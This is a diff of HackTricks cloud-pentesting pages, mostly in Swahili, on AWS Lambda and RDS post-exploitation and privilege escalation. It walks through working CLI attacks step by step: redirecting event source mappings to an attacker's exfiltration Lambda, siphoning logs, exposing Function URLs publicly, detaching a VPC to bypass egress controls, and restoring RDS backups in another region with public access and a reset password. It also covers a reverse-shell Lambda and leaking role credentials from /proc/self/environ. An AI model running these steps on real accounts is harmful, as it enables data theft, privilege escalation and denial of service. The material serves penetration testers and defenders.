+Mtuhumiwa (attacker) aliye na permissions zilizoorodheshwa anaweza mount arbitrary in-VPC EFS Access Points ndani ya victim Lambda functions ili kusoma na exfiltrate shared configuration na secrets zilizohifadhiwa kwenye EFS ambazo hapo awali zilikuwa inaccessible kwa function hiyo.
+
+## Usafishaji
+```
+aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true
+```
+

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md

@@ -0,0 +1,75 @@
+# AWS - Hijack Event Source Mapping to Redirect Stream/SQS/Kinesis to Attacker Lambda
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+Tumia vibaya `UpdateEventSourceMapping` kubadili Lambda function inayolengwa ya Event Source Mapping (ESM) iliyopo, ili rekodi kutoka DynamoDB Streams, Kinesis, au SQS ziwasilishwe kwa function inayodhibitiwa na mdukuzi. Hii inaelekeza kwa ukimya data ya moja kwa moja bila kuathiri producer apps au msimbo wa function wa awali.
+
+## Athari
+- Kuelekeza na kusoma rekodi za moja kwa moja kutoka streams/queues zilizopo bila kubadilisha programu zinazotoa au msimbo wa mwathiriwa.
+- Inawezekana kuondoa data nje (data exfiltration) au kubadilisha mantiki kwa kuchakata trafiki ya mwathiriwa katika function haramu.
+
+## Ruhusa zinazohitajika
+- `lambda:ListEventSourceMappings`
+- `lambda:GetEventSourceMapping`
+- `lambda:UpdateEventSourceMapping`
+- Uwezo wa kupeleka au kurejea Lambda inayodhibitiwa na mdukuzi (`lambda:CreateFunction` au ruhusa ya kutumia moja iliyopo).
+
+## Hatua
+
+1) Orodhesha Event Source Mappings za function ya mwathiriwa
+```
+TARGET_FN=<victim-function-name>
+aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[].{UUID:UUID,State:State,EventSourceArn:EventSourceArn}'
+export MAP_UUID=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[0].UUID' --output text)
+export EVENT_SOURCE_ARN=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[0].EventSourceArn' --output text)
+```
+2) Andaa attacker-controlled receiver Lambda (mkoa ule ule; ikiwezekana VPC/runtime inayofanana)
+```
+cat > exfil.py <<'PY'
+import json, boto3, os, time
+
+def lambda_handler(event, context):
+print(json.dumps(event)[:3000])
+b = os.environ.get('EXFIL_S3')
+if b:
+k = f"evt-{int(time.time())}.json"
+boto3.client('s3').put_object(Bucket=b, Key=k, Body=json.dumps(event))
+return {'ok': True}
+PY
+zip exfil.zip exfil.py
+ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-(and optional S3)-permissions>
+export ATTACKER_FN_ARN=$(aws lambda create-function \
+--function-name ht-esm-exfil \
+--runtime python3.11 --role $ATTACKER_LAMBDA_ROLE_ARN \
+--handler exfil.lambda_handler --zip-file fileb://exfil.zip \
+--query FunctionArn --output text)
+```
+3) Badilisha mapping ili iielekezwe kwa attacker function
+```
+aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $ATTACKER_FN_ARN
+```
+4) Zalisha tukio kwenye chanzo ili mapping ianzishwe (mfano: SQS)
+```
+SOURCE_SQS_URL=<queue-url>
+aws sqs send-message --queue-url $SOURCE_SQS_URL --message-body '{"x":1}'
+```
+5) Thibitisha attacker function inapokea batch
+```
+aws logs filter-log-events --log-group-name /aws/lambda/ht-esm-exfil --limit 5
+```
+6) Kuficha (hiari)
+```
+# Pause mapping while siphoning events
+aws lambda update-event-source-mapping --uuid $MAP_UUID --enabled false
+
+# Restore original target later
+aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $TARGET_FN --enabled true
+```
+Vidokezo:
+- Kwa SQS ESMs, role ya utekelezaji ya Lambda inayoshughulikia queue inahitaji `sqs:ReceiveMessage`, `sqs:DeleteMessage`, na `sqs:GetQueueAttributes` (sera iliyosimamiwa: `AWSLambdaSQSQueueExecutionRole`).
+- UUID ya ESM inabaki ile ile; tu `FunctionArn` yake inabadilika, hivyo producers na source ARNs hazuguswi.
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md

@@ -0,0 +1,46 @@
+# AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)
+
+Geuza Lambda Function URL ya kibinafsi kuwa endpoint ya umma isiyohitaji uthibitisho kwa kubadili Function URL AuthType kuwa NONE na kuambatisha resource-based policy inayoruhusu lambda:InvokeFunctionUrl kwa kila mtu. Hii inawawezesha watu kuita kwa anonymous internal functions na inaweza kufichua operesheni za nyuma (backend) zenye taarifa nyeti.
+
+## Abusing it
+
+- Pre-reqs: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
+- Mkoa: us-east-1
+
+### Steps
+1) Hakikisha Lambda function ina Function URL (defaults to AWS_IAM):
+```
+aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
+```
+
+2) Badilisha URL kuwa ya umma (AuthType NONE):
+```
+aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE
+```
+
+3) Ongeza resource-based policy statement ili kuruhusu principals zisizo na uthibitisho:
+```
+aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE
+```
+
+4) Pata URL na uitumie bila kredensiali:
+```
+URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
+curl -sS "$URL"
+```
+
+### Impact
+- Lambda function inakuwa inapatikana bila uthibitisho kupitia intaneti.
+
+### Example output (unauthenticated 200)
+```
+HTTP 200
+https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
+{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}
+```
+### Usafishaji
+```
+aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
+aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
+```
+

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md

@@ -0,0 +1,51 @@
+# AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+Tumia vibaya vigezo vya logging vya hali ya juu vya `lambda:UpdateFunctionConfiguration` ili kuyaelekeza tena logi za function kwenye CloudWatch Logs log group iliyochaguliwa na mshambuliaji. Hii inafanya kazi bila kubadilisha code au execution role (matawi mengi ya Lambda tayari yanajumuisha `logs:CreateLogGroup/CreateLogStream/PutLogEvents` kupitia `AWSLambdaBasicExecutionRole`). Ikiwa function inachapisha secrets/request bodies au inashindwa (crash) na stack traces, unaweza kuzikusanya kutoka kwenye log group mpya.
+
+## Ruhusa zinazohitajika
+- lambda:UpdateFunctionConfiguration
+- lambda:GetFunctionConfiguration
+- lambda:InvokeFunction (au kutegemea triggers zilizopo)
+- logs:CreateLogGroup (sio lazima mara nyingi ikiwa role ya function ina)
+- logs:FilterLogEvents (kusoma events)
+
+## Hatua
+1) Unda sink log group
+```
+aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
+```
+2) Elekeza upya target function logs
+```
+aws lambda update-function-configuration \
+--function-name <TARGET_FN> \
+--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
+--region us-east-1
+```
+Subiri hadi `LastUpdateStatus` iwe `Successful`:
+```
+aws lambda get-function-configuration --function-name <TARGET_FN> \
+--query LastUpdateStatus --output text
+```
+3) Iitisha na usome kutoka kwenye sink
+```
+aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
+sleep 5
+aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
+```
+## Athari
+- Kuelekeza kwa siri application/system logs zote kwenye log group unayodhibiti, ukiepuka matarajio kwamba logs zitafika tu katika `/aws/lambda/<fn>`.
+- Exfiltrate data nyeti zilizochapishwa na function au zilizoonekana katika errors.
+
+## Usafishaji
+```
+aws lambda update-function-configuration --function-name <TARGET_FN> \
+--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
+--region us-east-1 || true
+```
+## Vidokezo
+- Udhibiti wa logging ni sehemu ya Lambda’s `LoggingConfig` (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel).
+- Kwa chaguo-msingi, Lambda hutuma logs kwenye `/aws/lambda/<function>`, lakini unaweza kuelekeza kwa jina lolote la log group; Lambda (au execution role) itaunda ikiwa itaruhusiwa.
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md

@@ -0,0 +1,12 @@
+# AWS Lambda – Runtime Pinning/Rollback Abuse via PutRuntimeManagementConfig
+
+Tumia vibaya `lambda:PutRuntimeManagementConfig` kuipin (pin) function kwa toleo maalum la runtime (Manual) au kuzuia masasisho (FunctionUpdate). Hii inahifadhi ulinganifu na layers/wrappers zenye madhara na inaweza kuweka function kwenye runtime ya zamani yenye udhaifu ili kusaidia exploitation na kudumu kwa muda mrefu.
+
+Mahitaji: `lambda:InvokeFunction`, `logs:FilterLogEvents`, `lambda:PutRuntimeManagementConfig`, `lambda:GetRuntimeManagementConfig`.
+
+Mfano (us-east-1):
+- Endesha: `aws lambda invoke --function-name  /tmp/ping.json --payload {} --region us-east-1 > /dev/null; sleep 5`
+- Zuia masasisho: `aws lambda put-runtime-management-config --function-name  --update-runtime-on FunctionUpdate --region us-east-1`
+- Thibitisha: `aws lambda get-runtime-management-config --function-name  --region us-east-1`
+
+Hiari, weka pin kwa toleo maalum la runtime kwa kutoa Runtime Version ARN kutoka kwenye INIT_START logs na kutumia `--update-runtime-on Manual --runtime-version-arn <arn>`.

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md

@@ -0,0 +1,63 @@
+# AWS Lambda – VPC Egress Bypass by Detaching VpcConfig
+
+Force a Lambda function out of a restricted VPC by updating its configuration with an empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]). The function will then run in the Lambda-managed networking plane, regaining outbound internet access and bypassing egress controls enforced by private VPC subnets without NAT.
+
+## Abusing it
+
+- Pre-reqs: lambda:UpdateFunctionConfiguration on the target function (and lambda:InvokeFunction to validate), plus permissions to update code/handler if changing them.
+- Assumptions: The function is currently configured with VpcConfig pointing to private subnets without NAT (so outbound internet is blocked).
+- Region: us-east-1
+
+### Steps
+
+0) Prepare a minimal handler that proves outbound HTTP works
+
+cat > net.py <<'PY'
+import urllib.request, json
+
+def lambda_handler(event, context):
+try:
+ip = urllib.request.urlopen('https://checkip.amazonaws.com', timeout=3).read().decode().strip()
+return {"egress": True, "ip": ip}
+except Exception as e:
+return {"egress": False, "err": str(e)}
+PY
+zip net.zip net.py
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://net.zip --region $REGION || true
+aws lambda update-function-configuration --function-name $TARGET_FN --handler net.lambda_handler --region $REGION || true
+
+1) Record current VPC config (to restore later if needed)
+
+aws lambda get-function-configuration --function-name $TARGET_FN --query 'VpcConfig' --region $REGION > /tmp/orig-vpc.json
+cat /tmp/orig-vpc.json
+
+2) Detach the VPC by setting empty lists
+
+aws lambda update-function-configuration \
+--function-name $TARGET_FN \
+--vpc-config SubnetIds=[],SecurityGroupIds=[] \
+--region $REGION
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+
+3) Invoke and verify outbound access
+
+aws lambda invoke --function-name $TARGET_FN /tmp/net-out.json --region $REGION >/dev/null
+cat /tmp/net-out.json
+
+(Optional) Restore original VPC config
+
+if jq -e '.SubnetIds | length > 0' /tmp/orig-vpc.json >/dev/null; then
+SUBS=$(jq -r '.SubnetIds | join(",")' /tmp/orig-vpc.json); SGS=$(jq -r '.SecurityGroupIds | join(",")' /tmp/orig-vpc.json)
+aws lambda update-function-configuration --function-name $TARGET_FN --vpc-config SubnetIds=[$SUBS],SecurityGroupIds=[$SGS] --region $REGION
+fi
+
+### Impact
+- Regains unrestricted outbound internet from the function, enabling data exfiltration or C2 from workloads that were intentionally isolated in private subnets without NAT.
+
+### Example output (after detaching VpcConfig)
+
+{"egress": true, "ip": "34.x.x.x"}
+
+### Cleanup
+- If you created any temporary code/handler changes, restore them.
+- Optionally restore the original VpcConfig saved in /tmp/orig-vpc.json as shown above.

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md

@@ -4,7 +4,7 @@
 
 ## RDS
 
-Kwa maelezo zaidi angalia:
+For more information check:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia:
 
 ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
 
-Ikiwa mshambuliaji ana ruhusa za kutosha, anaweza kufanya **DB iweze kupatikana hadharani** kwa kuunda snapshot ya DB, na kisha DB inayoweza kupatikana hadharani kutoka kwa snapshot.
+Ikiwa mshambuliaji ana ruhusa za kutosha, anaweza kufanya **DB ipatikane kwa umma** kwa kuunda snapshot ya DB, kisha kuunda DB inayopatikana kwa umma kutoka kwenye snapshot.
 ```bash
 aws rds describe-db-instances # Get DB identifier
 
@@ -40,9 +40,9 @@ aws rds modify-db-instance \
 ```
 ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
 
-Mshambuliaji mwenye ruhusa hizi anaweza **kuunda snapshot ya DB** na kuifanya **ipatikane** **hadharani**. Kisha, anaweza tu kuunda katika akaunti yake mwenyewe DB kutoka kwa snapshot hiyo.
+Mshambulizi akiwa na ruhusa hizi anaweza **kuunda snapshot ya DB** na kuifanya **kwa umma** **kupatikana**. Kisha, anaweza kuunda DB katika akaunti yake mwenyewe kutoka kwenye snapshot hiyo.
 
-Ikiwa mshambuliaji **hana `rds:CreateDBSnapshot`**, bado anaweza kufanya **snapshots** nyingine zilizoundwa kuwa **hadharani**.
+Ikiwa mshambulizi **hana `rds:CreateDBSnapshot`**, bado anaweza kufanya **nyingine** snapshots zilizoundwa **za umma**.
 ```bash
 # create snapshot
 aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
@@ -53,30 +53,114 @@ aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --
 ```
 ### `rds:DownloadDBLogFilePortion`
 
-Mshambuliaji mwenye ruhusa ya `rds:DownloadDBLogFilePortion` anaweza **kupakua sehemu za faili za logi za RDS**. Ikiwa data nyeti au akreditivu za ufikiaji zimeandikwa kwa bahati mbaya, mshambuliaji anaweza kutumia taarifa hii kuongeza mamlaka yao au kufanya vitendo visivyoidhinishwa.
+Mshambuliaji mwenye ruhusa ya `rds:DownloadDBLogFilePortion` anaweza **kupakua sehemu za faili za logi za instance ya RDS**. Ikiwa data nyeti au vitambulisho vya ufikiaji vimeandikwa kwa bahati mbaya kwenye logi, mshambuliaji anaweza kutumia taarifa hizi kuinua mamlaka yake au kutekeleza vitendo visivyoidhinishwa.
 ```bash
 aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
 ```
-**Madhara Yanayoweza Kutokea**: Ufikiaji wa taarifa nyeti au vitendo visivyoidhinishwa kwa kutumia akreditivu zilizovuja.
+**Potential Impact**: Upatikanaji wa taarifa nyeti au vitendo visivyoidhinishwa kwa kutumia leaked credentials.
 
 ### `rds:DeleteDBInstance`
 
-Mshambuliaji mwenye ruhusa hizi anaweza **kusababisha DoS kwa RDS instances zilizopo**.
+Mshambuliaji mwenye ruhusa hizi anaweza kufanya **DoS kwa instances za RDS zilizopo**.
 ```bash
 # Delete
 aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
 ```
-**Madhara yanayoweza kutokea**: Kufutwa kwa mifano ya RDS iliyopo, na kupoteza kwa data.
+**Athari inayowezekana**: Ufutaji wa instances za RDS zilizopo, na uwezekano wa kupoteza data.
 
 ### `rds:StartExportTask`
 
 > [!NOTE]
 > TODO: Jaribu
 
-Mshambuliaji mwenye ruhusa hii anaweza **kutoa picha ya mfano wa RDS kwenye kikasha cha S3**. Ikiwa mshambuliaji ana udhibiti wa kikasha cha S3 kilichokusudiwa, wanaweza kupata data nyeti ndani ya picha iliyotolewa.
+Mshambuliaji mwenye ruhusa hii anaweza **export an RDS instance snapshot to an S3 bucket**. Ikiwa mshambuliaji ana udhibiti wa S3 bucket ya lengo, wanaweza kufikia data nyeti ndani ya exported snapshot.
 ```bash
 aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
 ```
-**Madhara yanayoweza kutokea**: Ufikiaji wa data nyeti katika picha iliyosafirishwa. 
+**Athari inayowezekana**: Ufikiaji wa data nyeti katika snapshot iliyotolewa.
+
+### Cross-Region Automated Backups Replication kwa Rejesho la Kificho (`rds:StartDBInstanceAutomatedBackupsReplication`)
+
+Tumia vibaya cross-Region automated backups replication kuiga kimya kimya automated backups za instance ya RDS hadi AWS Region nyingine na kuzirejesha pale. Mshambuliaji anaweza kisha kufanya DB iliyorejeshwa ipatikane hadharani na kuweka upya nenosiri la master ili kufikia data kwa njia isiyo ya kawaida katika Region ambayo watetezi wanaweza wasiifuatilie.
+
+Ruhusa zinazohitajika (kiwango cha chini):
+- `rds:StartDBInstanceAutomatedBackupsReplication` katika Region ya lengo
+- `rds:DescribeDBInstanceAutomatedBackups` katika Region ya lengo
+- `rds:RestoreDBInstanceToPointInTime` katika Region ya lengo
+- `rds:ModifyDBInstance` katika Region ya lengo
+- `rds:StopDBInstanceAutomatedBackupsReplication` (kusafisha chaguo)
+- `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress` (ili kufanya DB iliyorejeshwa ifikike kwa umma)
+
+Athari: Persistence na kuiba/data exfiltration kwa kurejesha nakala ya data za production ndani ya Region nyingine na kuziweka wazi kwa umma kwa kutumia credentials zinazosimamiwa na mshambuliaji.
+
+<details>
+<summary>CLI kutoka mwanzo hadi mwisho (badilisha placeholders)</summary>
+```bash
+# 1) Recon (SOURCE region A)
+aws rds describe-db-instances \
+--region <SOURCE_REGION> \
+--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
+--output table
+
+# 2) Start cross-Region automated backups replication (run in DEST region B)
+aws rds start-db-instance-automated-backups-replication \
+--region <DEST_REGION> \
+--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
+--source-region <SOURCE_REGION> \
+--backup-retention-period 7
+
+# 3) Wait for replication to be ready in DEST
+aws rds describe-db-instance-automated-backups \
+--region <DEST_REGION> \
+--query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
+--output table
+# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn
+
+# 4) Restore to latest restorable time in DEST
+aws rds restore-db-instance-to-point-in-time \
+--region <DEST_REGION> \
+--source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
+--target-db-instance-identifier <TARGET_DB_ID> \
+--use-latest-restorable-time \
+--db-instance-class db.t3.micro
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 5) Make public and reset credentials in DEST
+# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
+OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
+--group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
+--query GroupId --output text)
+aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
+--group-id "$OPEN_SG_ID" \
+--ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'
+
+# 5b) Publicly expose restored DB and attach the SG
+aws rds modify-db-instance --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--publicly-accessible \
+--vpc-security-group-ids "$OPEN_SG_ID" \
+--apply-immediately
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 5c) Reset the master password
+aws rds modify-db-instance --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--master-user-password '<NEW_STRONG_PASSWORD>' \
+--apply-immediately
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
+ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--query 'DBInstances[0].Endpoint.Address' --output text)
+mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'
+
+# 7) Optional: stop replication
+aws rds stop-db-instance-automated-backups-replication \
+--region <DEST_REGION> \
+--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
+```
+</details>
+
 
 {{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md

@@ -4,7 +4,7 @@
 
 ## lambda
 
-Maelezo zaidi kuhusu lambda katika:
+More info about lambda in:
 
 {{#ref}}
 ../aws-services/aws-lambda-enum.md
@@ -12,11 +12,11 @@ Maelezo zaidi kuhusu lambda katika:
 
 ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
 
-Watumiaji wenye ruhusa **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:InvokeFunction`** wanaweza kuongeza mamlaka yao.\
-Wanaweza **kuunda kazi mpya ya Lambda na kuipatia jukumu la IAM lililopo**, wakitoa kazi hiyo ruhusa zinazohusiana na jukumu hilo. Mtumiaji anaweza kisha **kuandika na kupakia msimbo kwenye kazi hii ya Lambda (kwa mfano, na rev shell)**.\
-Mara kazi hiyo inapowekwa, mtumiaji anaweza **kuanzisha utekelezaji wake** na vitendo vilivyokusudiwa kwa kuitisha kazi ya Lambda kupitia API ya AWS. Njia hii inaruhusu mtumiaji kufanya kazi kwa njia isiyo ya moja kwa moja kupitia kazi ya Lambda, ikifanya kazi kwa kiwango cha ufikiaji kilichotolewa kwa jukumu la IAM lililohusishwa nacho.\\
+Watumiaji walio na ruhusa **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** wanaweza kuongeza hadhi zao za ruhusa.\
+Wanaweza **kuunda Lambda function mpya na kuiweka IAM role iliyopo**, ikimpa function ruhusa zinazohusiana na role hiyo. Mtumiaji anaweza kisha **kuandika na kupakia code kwenye Lambda function hii (kwa mfano na rev shell)**.\
+Mara function itakapowekwa, mtumiaji anaweza **kuamsha utekelezaji wake** na vitendo vilivyokusudiwa kwa kuiita Lambda function kupitia AWS API. Njia hii kwa ufanisi inamruhusu mtumiaji kutekeleza kazi kwa njia isiyo ya moja kwa moja kupitia Lambda function, akifanya kazi kwa ngazi ya upatikanaji uliotolewa kwa IAM role iliyohusishwa nayo.\\
 
-Mshambuliaji anaweza kutumia hii kupata **rev shell na kuiba token**:
+Mshambulizi anaweza kutumia hili vibaya kupata **rev shell na kuiba token**:
 ```python:rev.py
 import socket,subprocess,os,time
 def lambda_handler(event, context):
@@ -46,8 +46,8 @@ aws lambda invoke --function-name my_function output.txt
 # List roles
 aws iam list-attached-user-policies --user-name <user-name>
 ```
-Unaweza pia **kutumia vibaya ruhusa za jukumu la lambda** kutoka kwa kazi ya lambda yenyewe.\
-Ikiwa jukumu la lambda lilikuwa na ruhusa za kutosha unaweza kulitumika kukupa haki za admin:
+Unaweza pia **abuse the lambda role permissions** kutoka kwa lambda function yenyewe.\
+Ikiwa lambda role ingekuwa na permissions za kutosha, ungeweza kuitumia kukupa admin rights:
 ```python
 import boto3
 def lambda_handler(event, context):
@@ -58,7 +58,7 @@ PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
 )
 return response
 ```
-Inawezekana pia kuvuja akreditivu za jukumu la lambda bila kuhitaji muunganisho wa nje. Hii itakuwa na manufaa kwa **Network isolated Lambdas** zinazotumika kwenye kazi za ndani. Ikiwa kuna vikundi vya usalama visivyojulikana vinavyofanya uchujaji wa shell zako za nyuma, kipande hiki cha msimbo kitakuruhusu kuvuja moja kwa moja akreditivu kama matokeo ya lambda.
+Pia inawezekana leak the lambda's role credentials bila kuhitaji muunganisho wa nje. Hii itakuwa muhimu kwa **Network isolated Lambdas** zinazotumika kwa kazi za ndani. Ikiwa kuna security groups zisizojulikana zinazochuja au kuzuia reverse shells zako, kipande hiki cha code kitakuwezesha leak credentials moja kwa moja kama output ya lambda.
 ```python
 def handler(event, context):
 sessiontoken = open('/proc/self/environ', "r").read()
@@ -72,34 +72,34 @@ return {
 aws lambda invoke --function-name <lambda_name> output.txt
 cat output.txt
 ```
-**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu la huduma ya lambda lililobainishwa.
+**Potential Impact:** Privesc ya moja kwa moja kwa role ya huduma ya lambda yoyote iliyotajwa.
 
 > [!CAUTION]
-> Kumbuka kwamba hata kama inaweza kuonekana kuvutia **`lambda:InvokeAsync`** **haikubali** kwa peke yake **kutekeleza `aws lambda invoke-async`**, unahitaji pia `lambda:InvokeFunction`
+> Kumbuka kwamba hata kama inaweza kuonekana kuvutia **`lambda:InvokeAsync`** **haituruhusu peke yake** **kuendesha `aws lambda invoke-async`**, pia unahitaji `lambda:InvokeFunction`
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
 
-Kama katika hali ya awali, unaweza **kujipe ruhusa ya `lambda:InvokeFunction`** ikiwa una ruhusa **`lambda:AddPermission`**
+Kama katika senario iliyotangulia, unaweza **kujipa ruhusa ya `lambda:InvokeFunction`** ikiwa una ruhusa **`lambda:AddPermission`**
 ```bash
 # Check the previous exploit and use the following line to grant you the invoke permissions
 aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
 --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
 ```
-**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu la huduma ya lambda lililobainishwa.
+**Potential Impact:** Privesc ya moja kwa moja kwa role ya huduma ya lambda iliyotajwa.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
 
-Watumiaji wenye ruhusa **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:CreateEventSourceMapping`** (na labda `dynamodb:PutItem` na `dynamodb:CreateTable`) wanaweza kwa njia isiyo ya moja kwa moja **kuinua mamlaka** hata bila `lambda:InvokeFunction`.\
-Wanaweza kuunda **kazi ya Lambda yenye msimbo mbaya na kuipatia jukumu la IAM lililopo**.
+Watumiaji wenye ruhusa **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:CreateEventSourceMapping`** (na pengine `dynamodb:PutItem` na `dynamodb:CreateTable`) wanaweza kwa njia isiyo ya moja kwa moja **escalate privileges** hata bila `lambda:InvokeFunction`.\
+Wanaweza kuunda **Lambda function yenye msimbo haribifu na kuiambatisha role ya IAM iliyopo**.
 
-Badala ya kuitisha moja kwa moja Lambda, mtumiaji anajiandaa au anatumia meza ya DynamoDB iliyopo, akiunganisha nayo Lambda kupitia ramani ya chanzo cha tukio. Mpangilio huu unahakikisha kazi ya Lambda inachochewa **kiotomatiki wakati kipengele kipya** kinapoingia kwenye meza, ama kwa kitendo cha mtumiaji au mchakato mwingine, hivyo basi kuitisha kazi ya Lambda kwa njia isiyo ya moja kwa moja na kutekeleza msimbo kwa ruhusa za jukumu la IAM lililopitishwa.
+Badala ya kuiita Lambda moja kwa moja, mtumiaji huandaa au hutumia jedwali la DynamoDB lililopo, akiunganisha na Lambda kupitia event source mapping. Mpangilio huu unahakikisha Lambda function inachochewa kiotomatiki wakati kipengee kipya kinaingizwa kwenye jedwali, iwe kwa kitendo cha mtumiaji au mchakato mwingine, na hivyo kwa njia isiyo ya moja kwa moja kuiita Lambda function na kutekeleza msimbo kwa ruhusa za IAM role iliyopitishwa.
 ```bash
 aws lambda create-function --function-name my_function \
 --runtime python3.8 --role <arn_of_lambda_role> \
 --handler lambda_function.lambda_handler \
 --zip-file fileb://rev.zip
 ```
-Ikiwa DynamoDB tayari ina shughuli katika mazingira ya AWS, mtumiaji tu **anahitaji kuanzisha ramani ya chanzo cha tukio** kwa kazi ya Lambda. Hata hivyo, ikiwa DynamoDB haitumiki, mtumiaji lazima **aweze kuunda meza mpya** yenye utiririshaji ulioanzishwa:
+Ikiwa DynamoDB tayari inatumika katika mazingira ya AWS, mtumiaji anahitaji tu **kuanzisha event source mapping** kwa Lambda function. Hata hivyo, ikiwa DynamoDB haitumiki, mtumiaji lazima **kuunda jedwali jipya** lenye streaming imewezeshwa:
 ```bash
 aws dynamodb create-table --table-name my_table \
 --attribute-definitions AttributeName=Test,AttributeType=S \
